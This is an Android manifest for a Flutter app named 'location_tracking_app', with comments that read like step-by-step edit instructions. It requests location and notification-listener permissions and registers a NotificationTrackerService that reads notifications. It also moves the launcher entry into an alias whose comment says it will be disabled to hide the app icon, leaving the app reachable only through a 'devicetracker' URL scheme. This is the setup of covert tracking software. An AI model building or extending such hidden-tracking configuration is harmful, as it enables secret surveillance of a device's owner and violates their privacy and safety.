<manifest xmlns:android="http://schemas.android.com/apk/res/android">

    <!-- Permissions remain the same -->
    <uses-permission android:name="android.permission.BIND_NOTIFICATION_LISTENER_SERVICE" />
    <uses-permission android:name="android.permission.ACCESS_FINE_LOCATION" />
    <!-- ... all other permissions -->
    <uses-permission android:name="android.permission.CHANGE_COMPONENT_ENABLED_STATE"/>

    <application
        android:label="location_tracking_app"
        android:name="${applicationName}"
        android:icon="@mipmap/ic_launcher">

        <!-- STEP 1: MainActivity no longer has the LAUNCHER intent. -->
        <!-- It is now opened ONLY by the custom URL scheme. -->
        <activity
            android:name=".MainActivity"
            android:exported="true"
            android:launchMode="singleTop"
            android:theme="@style/LaunchTheme"
            android:configChanges="orientation|keyboardHidden|keyboard|screenSize|smallestScreenSize|locale|layoutDirection|fontScale|screenLayout|density|uiMode"
            android:hardwareAccelerated="true"
            android:windowSoftInputMode="adjustResize">

            <!-- The custom URL scheme intent filter STAYS HERE -->
            <intent-filter>
                <action android:name="android.intent.action.VIEW" />
                <category android:name="android.intent.category.DEFAULT" />
                <category android:name="android.intent.category.BROWSABLE" />
                <data android:scheme="devicetracker" android:host="open" />
            </intent-filter>

        </activity>

        <!-- STEP 2: ADD THIS NEW ACTIVITY-ALIAS -->
        <!-- This alias acts as the launcher icon. We will disable THIS to hide the icon. -->
        <activity-alias
            android:name=".LauncherAlias"
            android:targetActivity=".MainActivity"
            android:exported="true">
            <intent-filter>
                <action android:name="android.intent.action.MAIN"/>
                <category android:name="android.intent.category.LAUNCHER"/>
            </intent-filter>
        </activity-alias>


        <!-- The rest of the file (service, meta-data) remains the same -->
        <service
            android:name=".NotificationTrackerService"
            android:exported="true"
            android:label="Notification Tracker"
            android:permission="android.permission.BIND_NOTIFICATION_LISTENER_SERVICE">
            <intent-filter>
                <action android:name="android.service.notification.NotificationListenerService" />
            </intent-filter>
        </service>

        <meta-data
            android:name="io.flutter.embedding.android.NormalTheme"
            android:resource="@style/NormalTheme" />
        <meta-data
            android:name="flutterEmbedding"
            android:value="2" />
    </application>
</manifest>
